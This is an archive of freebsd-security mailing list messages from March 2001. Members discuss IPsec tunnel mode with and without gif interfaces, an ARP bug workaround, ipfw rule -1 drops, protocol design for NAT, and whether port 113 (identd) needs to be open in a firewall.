To: freebsd-security@freebsd.org
Subject: Re: IPSEC tunnel without gif?
References: <3AAEF702.9AC2715B@ahpcns.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
jomor wrote:
> I've been setting up a VPN with tunnel mode IPSEC and things are going
> OK so far but in searching the list archives, I've found some stuff that
> seems to imply that gif tunnels are not needed for tunnel mode. Is this
> true? I've only gotten it to work by pre-configuring the gif tunnel, but
> now I'm not sure if I have true "tunnel mode IPSEC" or "transport mode
> IPSEC" applied to an "IP-ENCAP" tunnel such as that suggested by the
> X-bone project.
>
> seeking enlightenment ...jgm
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
Replying to my own post for those who are interested...
I have set up a simple test network to figure this out. It's similar to the
one in the ipsec.html page of the handbook except that I added a router to
split up the segment between the gateways in order to better simulate "the
Internet" piece. Routes were in place only to provide connectivity between
the external interfaces of the "tunnel endpoint gateway" machines. The
router sitting in the middle of the whole thing had no knowledge of the
"private" networks. NAT was not enabled anywhere. The ipsec.conf files are
just like the handbook page commands except that I made a versions for esp
only and another version for ah (not "ah-old") and I specified "-m tunnel"
instead of "-m any". After executing setkey I was able to ping the remote
hosts for at least a little while. I was not able to connect long enough to
do anything useful. Flushing and reloading the ipsec.conf file didn't
help. Only a reboot would get it going again (but not for long). I ran some
traces with a Network General sniffer and things looked as I expected while
the pings were working. When the pings stopped working I could see that one
of the gateways continued to transmit the pings, which did get to the
remote gateway. The gateway that received the pings was transmitting ARP
requests but strangely, it was trying to get the hardware address of the
other tunnel endpoint rather than that of the router in the middle. Since
the ARP requests were never answered, the ping response was never
transmitted. This behavior was identical for both ah and esp tunnels. After
rebooting all the machines, I created the gif tunnels and executed setkey.
I was able to ftp some 1-5 MB files this way. I left the setup running over
night so I'll see if it's still functioning in the morning. I'll be doing
some traces with the gif setup for comparison as well.
...jgm
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 20:40:46 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dragon.awen.com (dragon.awen.com [208.176.22.138])
by hub.freebsd.org (Postfix) with ESMTP id 9CA2437B719
for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 20:40:44 -0800 (PST)
(envelope-from mburgett@dragon.awen.com)
Received: (from mburgett@localhost)
by dragon.awen.com (8.11.2/8.11.2) id f2F4eZB25117;
Wed, 14 Mar 2001 20:40:35 -0800 (PST)
Message-Id: <200103150440.f2F4eZB25117@dragon.awen.com>
From: "Mike Burgett" <mburgett@awen.com>
To: "jomor" <jomor@ahpcns.com>
Cc: "freebsd-security@FreeBSD.ORG" <freebsd-security@FreeBSD.ORG>
Date: Wed, 14 Mar 2001 20:40:35 -0800
Reply-To: "Mike Burgett" <mburgett@awen.com>
X-Mailer: PMMail 2000 Professional (2.20.2030) For Windows 98 (4.10.2222)
In-Reply-To: <3AB0434A.2DEC2598@ahpcns.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Subject: Re: IPSEC tunnel without gif?
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Wed, 14 Mar 2001 22:21:30 -0600, jomor wrote:
>The gateway that received the pings was transmitting ARP
>requests but strangely, it was trying to get the hardware
>address of the other tunnel endpoint rather than that of
>the router in the middle. Since the ARP requests were never
>answered, the ping response was never transmitted.
This sounds an awful lot like:
http://www.FreeBSD.org/cgi/query-pr.cgi?pr=21079
I added a static arp entry for my router awhile back to work around this
very thing.
Thanks,
Mike
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 23:39:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82])
by hub.freebsd.org (Postfix) with ESMTP id 40DBD37B719
for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 23:39:19 -0800 (PST)
(envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com)
Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19);
Wed, 14 Mar 2001 23:37:08 -0800
Received: (from cjc@localhost)
by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2F7dGM24680;
Wed, 14 Mar 2001 23:39:16 -0800 (PST)
(envelope-from cjc)
Date: Wed, 14 Mar 2001 23:39:15 -0800
From: "Crist J. Clark" <cjclark@reflexnet.net>
To: Szilveszter Adam <sziszi@petra.hos.u-szeged.hu>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
Message-ID: <20010314233915.E496@cjc-desktop.users.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References: <Pine.BSF.4.21.0103140841480.4793-100000@mohegan.mohawk.net> <200103141333.f2EDX0J19096@fusion.borderware.com> <20010314231442.F12391@petra.hos.u-szeged.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010314231442.F12391@petra.hos.u-szeged.hu>; from sziszi@petra.hos.u-szeged.hu on Wed, Mar 14, 2001 at 11:14:42PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Wed, Mar 14, 2001 at 11:14:42PM +0100, Szilveszter Adam wrote:
> > Ralph Huntington wrote:
> > > > (This is one case where blocking of port 25 by ISPs is a good thing.)
>
> Yes. And makes using eg send-pr(1) real fun(TM).
Huh? send-pr(1) just uses sendmail. It gets forwarded the same way all
of your other mail does. What am I missing?
--
Crist J. Clark cjclark@alum.mit.edu
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 23:43:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82])
by hub.freebsd.org (Postfix) with ESMTP id A3FD537B71A
for <security@freebsd.org>; Wed, 14 Mar 2001 23:43:16 -0800 (PST)
(envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com)
Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19);
Wed, 14 Mar 2001 23:41:16 -0800
Received: (from cjc@localhost)
by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2F7hHd24720;
Wed, 14 Mar 2001 23:43:17 -0800 (PST)
(envelope-from cjc)
Date: Wed, 14 Mar 2001 23:43:17 -0800
From: "Crist J. Clark" <cjclark@reflexnet.net>
To: Udo Erdelhoff <ue@nathan.ruhr.de>
Cc: security@FreeBSD.ORG
Subject: Re: ipfw rule -1?
Message-ID: <20010314234317.F496@cjc-desktop.users.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References: <20010313084020.A5859@agora.rdrop.com> <20010313232014.B496@cjc-desktop.users.reflexcom.com> <20010314220613.L83336@nathan.ruhr.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010314220613.L83336@nathan.ruhr.de>; from ue@nathan.ruhr.de on Wed, Mar 14, 2001 at 10:06:14PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Wed, Mar 14, 2001 at 10:06:14PM +0100, Udo Erdelhoff wrote:
> On Tue, Mar 13, 2001 at 11:20:14PM -0800, Crist J. Clark wrote:
> > Rule -1 is given for any packet dropped, but not dropped due to a user
> > rule or the default rule. A quick look at the souce indicates the
> > above pseudo-rule and some other fragment issues (bogusfrag) are the
> > only such situations.
>
> Hmm, I have the following setup: A -current box mounts /usr/src5 and
> /usr/obj5 via NFS from a RELENG_4 box. Doing "make installworld" fails
> as soon there's a fragmented NFS packet - the fragments are dropped
> by rule -1.
The only time UDP packets would be dropped is when a m_pullup() call
fails. I am not sure what that implies, but it does not sound good.
I don't think that should be failing.
--
Crist J. Clark cjclark@alum.mit.edu
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 0: 2:40 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtppop2pub.verizon.net (smtppop2pub.gte.net [206.46.170.21])
by hub.freebsd.org (Postfix) with ESMTP
id 4080637B719; Thu, 15 Mar 2001 00:02:32 -0800 (PST)
(envelope-from res03db2@gte.net)
Received: from gte.net (evrtwa1-ar4-4-34-145-186.dsl.gtei.net [4.34.145.186])
by smtppop2pub.verizon.net with ESMTP
; id MAA110143109
Tue, 13 Mar 2001 12:56:47 -0600 (CST)
Received: (from res03db2@localhost)
by gte.net (8.9.3/8.9.3) id KAA59416;
Tue, 13 Mar 2001 10:49:28 -0800 (PST)
(envelope-from res03db2@gte.net)
Date: Tue, 13 Mar 2001 10:49:27 -0800
From: Robert Clark <res03db2@gte.net>
To: Ted Mittelstaedt <tedm@toybox.placo.com>
Cc: Bob Van Valzah <Bob@Talarian.Com>, pW <packetwhore@stargate.net>,
FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel
Message-ID: <20010313104927.A59404@darkstar.gte.net>
References: <3AACF40D.4080504@Talarian.Com> <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.4i
In-Reply-To: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>; from tedm@toybox.placo.com on Mon, Mar 12, 2001 at 11:02:03PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Ted, do you know of any online guidelines to wrting protocols
that function well with NAT?
Or maybe a list of protocols that don't work well with NAT?
Thanks, [RC]
On Mon, Mar 12, 2001 at 11:02:03PM -0800, Ted Mittelstaedt wrote:
> >-----Original Message-----
> >From: owner-freebsd-questions@FreeBSD.ORG
> >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
> >Sent: Monday, March 12, 2001 8:07 AM
> >To: pW
> >Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
> >Subject: Re: Racoon Problem & Cisco Tunnel
> >
> >
> >Yes. The five DSL setups with which I'm familiar all grant at least one
> >public address per house. I believe all are static, but one might be
> >dynamic. Interference with protocols like IPSec is one of the reasons
> >why I'd make a public address a requirement when choising a DSL
> >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
> >possible. Let's hasten the deployment of IPv6.
> >
>
-snip-
>
> NAT has proven itself reliable and vital and idiot engineers that design TCP
> protocols that assume everyone has a public IP number are just architecting
> their own failures, and their protocol's subsequent minimizing by the
> market. I have some sympathy for protocols like IPSec that came to be
> during the same time - but organizational-to-organizational IPSec tunnels
> don't have to pass through the NAT - they can terminate on it. But, anyone
> doing a new protocol today is a fool if it can't work though a NAT.
>
>
>
> Ted Mittelstaedt tedm@toybox.placo.com
> Author of: The FreeBSD Corporate Networker's Guide
> Book website: http://www.freebsd-corp-net-guide.com
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 1:40:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82])
by hub.freebsd.org (Postfix) with ESMTP
id A7FD537B719; Thu, 15 Mar 2001 01:40:11 -0800 (PST)
(envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com)
Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19);
Thu, 15 Mar 2001 01:38:04 -0800
Received: (from cjc@localhost)
by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2F9e3028801;
Thu, 15 Mar 2001 01:40:03 -0800 (PST)
(envelope-from cjc)
Date: Thu, 15 Mar 2001 01:39:55 -0800
From: "Crist J. Clark" <cjclark@reflexnet.net>
To: Robert Clark <res03db2@gte.net>
Cc: Ted Mittelstaedt <tedm@toybox.placo.com>,
Bob Van Valzah <Bob@Talarian.Com>, pW <packetwhore@stargate.net>,
FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel
Message-ID: <20010315013955.A28471@rfx-216-196-73-168.users.reflex>
Reply-To: cjclark@alum.mit.edu
References: <3AACF40D.4080504@Talarian.Com> <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com> <20010313104927.A59404@darkstar.gte.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010313104927.A59404@darkstar.gte.net>; from res03db2@gte.net on Tue, Mar 13, 2001 at 10:49:27AM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Tue, Mar 13, 2001 at 10:49:27AM -0800, Robert Clark wrote:
>
>
> Ted, do you know of any online guidelines to wrting protocols
> that function well with NAT?
>
>
> Or maybe a list of protocols that don't work well with NAT?
One of the problems with NAT is that there are no standards. It
supports whatever the NAT software vendor felt like supporting. In
general, to be safe, the list of protocols that do not work well with
NAT are,
1) Any protocol that is not TCP.
Except you usually can get by with UDP, but watch for timeouts that
can vary from seconds to hours. ICMP? Some might work, some might
not, again, depends on the vendor. IPsec? Well, NAT completely breaks
AH, but the code to NAT IPsec is completely trivial which does not
imply that a lot of vendors do. Of course, NAT may or may not cause
your IKE negotiations to fail... depending on the NAT implementation
_and_ the IPsec implementation. Any other protocol? Maybe GRE, but
good luck with anything else.
Madness I tell you, madness. As RFC1631 says (an exact quote),
The negative characteristics [of NAT] are:
.
.
.
5. Problems with SNMP, DNS, ... you name it.
^^^^^^^^^^^
Damn straight; we've know all of this from the e begining.
And on top of this, whatever you are running at the application layer
might not like NAT either. Some minor protocols like, oh, FTP, need to
have data changed at the application layer to function. The NAT
software effectively has to act as an application proxy.
--
Crist J. Clark cjclark@alum.mit.edu
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 2:20:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15])
by hub.freebsd.org (Postfix) with ESMTP
id E785637B719; Thu, 15 Mar 2001 02:20:21 -0800 (PST)
(envelope-from tedm@toybox.placo.com)
Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154])
by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2FAAvx03944;
Thu, 15 Mar 2001 02:10:57 -0800 (PST)
(envelope-from tedm@toybox.placo.com)
From: "Ted Mittelstaedt" <tedm@toybox.placo.com>
To: "Robert Clark" <res03db2@gte.net>
Cc: "Bob Van Valzah" <Bob@Talarian.Com>,
"pW" <packetwhore@stargate.net>, <FreeBSD-Security@FreeBSD.ORG>,
<FreeBSD-Questions@FreeBSD.ORG>
Subject: RE: Racoon Problem & Cisco Tunnel
Date: Thu, 15 Mar 2001 02:10:56 -0800
Message-ID: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
In-reply-to: <20010313104927.A59404@darkstar.gte.net>
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
>-----Original Message-----
>From: owner-freebsd-questions@FreeBSD.ORG
>[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Robert Clark
>
>Ted, do you know of any online guidelines to wrting protocols
>that function well with NAT?
>
The rule of thumb is don't embed port information in the data payload. But
here's some references:
K. Egevang, P. Francis, "The IP Network Address Translator(NAT)",
RFC 1631, May 1994.
T. Hain, "Architectural Implications of NAT", Internet Draft,July 1998.
Matt Holdrege, Pyda Srisuresh, "IP Network Address Translator(NAT)
Protocol Issues", Internet Draft, August 1998.
Yakov Rekhter, "Implications of NAT’s on the TCP/IParchitecture",
Internet Draft, August 1998.
P. Srisuresh, Matt Holdrege, "IP Network Address Translator(NAT)
Terminology and Considerations", Internet Draft, July 1998.
This list is from a post that Jim Gray made to the Questions list back
in October that was very good.
>
>Or maybe a list of protocols that don't work well with NAT?
>
This is entirely implementation dependent. For example, Cisco has a list
somewhere on their website that shows the ones they do and don't
support. I don't know if anyone has made up a list for natd.
Ted Mittelstaedt tedm@toybox.placo.com
Author of: The FreeBSD Corporate Networker's Guide
Book website: http://www.freebsd-corp-net-guide.com
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 10:20: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salseiros.melim.com.br (salseiros.melim.com.br [200.215.110.23])
by hub.freebsd.org (Postfix) with ESMTP id A5E6937B719
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 10:19:55 -0800 (PST)
(envelope-from ronan@melim.com.br)
Received: from fazendinha (fazendinha.melim.com.br [192.168.168.42])
by salseiros.melim.com.br (8.9.3/8.9.3) with SMTP id PAA80676
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:12:47 -0300 (EST)
(envelope-from ronan@melim.com.br)
Message-ID: <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br>
From: "Ronan Lucio" <ronan@melim.com.br>
To: <security@FreeBSD.ORG>
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
Subject: Port 113
Date: Thu, 15 Mar 2001 15:19:20 -0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Hi all,
Could anybody say me when I need to allow the port 113
in the firewall?
What services use this port?
For example: I have a computer that is only DNS server,
Does this port need allow connections the to DNS service work?
Thank´s
Ronan Lucio
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 10:24:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.epylon.com (sf-gw.epylon.com [63.93.9.98])
by hub.freebsd.org (Postfix) with ESMTP id 81B6837B718
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 10:24:54 -0800 (PST)
(envelope-from Jason.DiCioccio@Epylon.com)
Received: by goofy.epylon.lan with Internet Mail Service (5.5.2653.19)
id <G87LPY3P>; Thu, 15 Mar 2001 10:24:53 -0800
Message-ID: <657B20E93E93D4118F9700D0B73CE3EA0166D6D2@goofy.epylon.lan>
From: Jason DiCioccio <Jason.DiCioccio@Epylon.com>
To: 'Ronan Lucio' <ronan@melim.com.br>, security@FreeBSD.ORG
Subject: RE: Port 113
Date: Thu, 15 Mar 2001 10:24:49 -0800
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
No, you dont need it for DNS, but it's identd.. Used by some daemons
to determine what the lusername of the client that's connecting is.
- -------
Jason DiCioccio
Evil Genius
Unix BOFH
mailto:jasond@epylon.com
415-593-2761 Direct & Fax
415-593-2900 Main
Epylon Corporation
645 Harrison Street, Suite 200
San Francisco, CA 94107
www.epylon.com
- -----Original Message-----
From: Ronan Lucio [mailto:ronan@melim.com.br]
Sent: Thursday, March 15, 2001 10:19 AM
To: security@FreeBSD.ORG
Subject: Port 113
Hi all,
Could anybody say me when I need to allow the port 113
in the firewall?
What services use this port?
For example: I have a computer that is only DNS server,
Does this port need allow connections the to DNS service work?
Thank=B4s
Ronan Lucio
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
iQA/AwUBOrEJaFCmU62pemyaEQL9IQCgsygTNUOep2NkkDFiuI8dOUUte9AAniQr
ZkwTGZUe4irnB8u1DsuYPQsg
=3DCdTR
-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 10:58:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salseiros.melim.com.br (salseiros.melim.com.br [200.215.110.23])
by hub.freebsd.org (Postfix) with ESMTP id F17C337B719
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 10:58:09 -0800 (PST)
(envelope-from ronan@melim.com.br)
Received: from fazendinha (fazendinha.melim.com.br [192.168.168.42])
by salseiros.melim.com.br (8.9.3/8.9.3) with SMTP id PAA85297
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:51:05 -0300 (EST)
(envelope-from ronan@melim.com.br)
Message-ID: <09bb01c0ad81$ce3a7d60$2aa8a8c0@melim.com.br>
From: "Ronan Lucio" <ronan@melim.com.br>
To: <security@FreeBSD.ORG>
References: <200103151822.f2FIMwp72248@pau-amma.whistle.com>
Subject: Re: Port 113
Date: Thu, 15 Mar 2001 15:57:37 -0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> >From: "Ronan Lucio" <ronan@melim.com.br>
> >Date: Thu, 15 Mar 2001 15:19:20 -0300
>
> >Could anybody say me when I need to allow the port 113
> >in the firewall?
>
> >What services use this port?
Sorry, I wanted to say Waht applications use this port?
What applications use auth service?
> pau-amma[1] grep 113 /etc/services
> auth 113/tcp ident tap #Authentication Service
> auth 113/udp ident tap #Authentication Service
>
> >For example: I have a computer that is only DNS server,
> >Does this port need allow connections the to DNS service work?
>
> No.
>
> Cheers,
> david
> --
> David Wolfskill dhw@whistle.com UNIX System Administrator
> Desk: 650/577-7158 TIE: 8/499-7158 Cell: 650/759-0823
>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 11: 9:51 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66])
by hub.freebsd.org (Postfix) with ESMTP
id 786FC37B719; Thu, 15 Mar 2001 11:09:43 -0800 (PST)
(envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131])
by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id MAA10308;
Thu, 15 Mar 2001 12:08:04 -0700 (MST)
(envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost)
by nomad.yogotech.com (8.8.8/8.8.8) id MAA05639;
Thu, 15 Mar 2001 12:08:03 -0700 (MST)
(envelope-from nate)
From: Nate Williams <nate@yogotech.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15025.4883.482820.502695@nomad.yogotech.com>
Date: Thu, 15 Mar 2001 12:08:03 -0700 (MST)
To: Robert Clark <res03db2@gte.net>
Cc: Ted Mittelstaedt <tedm@toybox.placo.com>,
Bob Van Valzah <Bob@Talarian.Com>, pW <packetwhore@stargate.net>,
FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel
In-Reply-To: <20010313104927.A59404@darkstar.gte.net>
References: <3AACF40D.4080504@Talarian.Com>
<000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>
<20010313104927.A59404@darkstar.gte.net>
X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> Ted, do you know of any online guidelines to wrting protocols
> that function well with NAT?
Here's some:
1) Single TCP socket (UDP requires special NAT code to work correctly).
2) The client must initiate the connection
3) The client's local port must *NOT* be fixed.
4) The server's remote port must be fixed
5) All port/address information must be contained within the packet
headers (no information must be passed in the contents of the
packets).
If your protocol follows the above guidelines, it should work fine under
NAT.
Nate
ps. Did I miss anything obvious?
> Or maybe a list of protocols that don't work well with NAT?
Any protocol that doesn't follow the above convention. DNS (which uses
UDP) is an 'exception' in that most NAT implementation contain special
code to deal with it.
> On Mon, Mar 12, 2001 at 11:02:03PM -0800, Ted Mittelstaedt wrote:
> > >-----Original Message-----
> > >From: owner-freebsd-questions@FreeBSD.ORG
> > >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
> > >Sent: Monday, March 12, 2001 8:07 AM
> > >To: pW
> > >Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
> > >Subject: Re: Racoon Problem & Cisco Tunnel
> > >
> > >
> > >Yes. The five DSL setups with which I'm familiar all grant at least one
> > >public address per house. I believe all are static, but one might be
> > >dynamic. Interference with protocols like IPSec is one of the reasons
> > >why I'd make a public address a requirement when choising a DSL
> > >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
> > >possible. Let's hasten the deployment of IPv6.
> > >
> >
>
> -snip-
>
> >
> > NAT has proven itself reliable and vital and idiot engineers that design TCP
> > protocols that assume everyone has a public IP number are just architecting
> > their own failures, and their protocol's subsequent minimizing by the
> > market. I have some sympathy for protocols like IPSec that came to be
> > during the same time - but organizational-to-organizational IPSec tunnels
> > don't have to pass through the NAT - they can terminate on it. But, anyone
> > doing a new protocol today is a fool if it can't work though a NAT.
> >
> >
> >
> > Ted Mittelstaedt tedm@toybox.placo.com
> > Author of: The FreeBSD Corporate Networker's Guide
> > Book website: http://www.freebsd-corp-net-guide.com
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 11:20:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66])
by hub.freebsd.org (Postfix) with ESMTP id 8065637B719
for <security@FreeBSD.ORG>; Thu, 15 Mar 2001 11:20:37 -0800 (PST)
(envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131])
by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id MAA10524;
Thu, 15 Mar 2001 12:20:35 -0700 (MST)
(envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost)
by nomad.yogotech.com (8.8.8/8.8.8) id MAA05688;
Thu, 15 Mar 2001 12:20:31 -0700 (MST)
(envelope-from nate)
From: Nate Williams <nate@yogotech.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15025.5630.472269.543769@nomad.yogotech.com>
Date: Thu, 15 Mar 2001 12:20:30 -0700 (MST)
To: "Ronan Lucio" <ronan@melim.com.br>
Cc: <security@FreeBSD.ORG>
Subject: Re: Port 113
In-Reply-To: <099801c0ad7c$75b63800$2aa8a8c0@melim.com.br>
References: <006b01c0ad38$39eed0a0$1401a8c0@tedm.placo.com>
<099801c0ad7c$75b63800$2aa8a8c0@melim.com.br>
X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> Could anybody say me when I need to allow the port 113
> in the firewall?
*Need* form auth is a strong word. However, it does tend to speed up
email transfers is you enable a version that always responds true.
So, any external SMTP servers you have *should* have this port enabled.
> What services use this port?
I know that SMTP uses it, and I believe that ftpd uses it, and I believe
irc also uses it.
> For example: I have a computer that is only DNS server,
> Does this port need allow connections the to DNS service work?
I don't believe so, but someone will certainly correct me if I'm wrong.
Nate
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Thu Mar 15 12:21:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from k2.jozsef.kando.hu (k2.jozsef.kando.hu [193.224.40.3])
by hub.freebsd.org (Postfix) with SMTP id A5C5637B719
for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 12:21:18 -0800 (PST)
(envelope-from bra@fsn.hu)
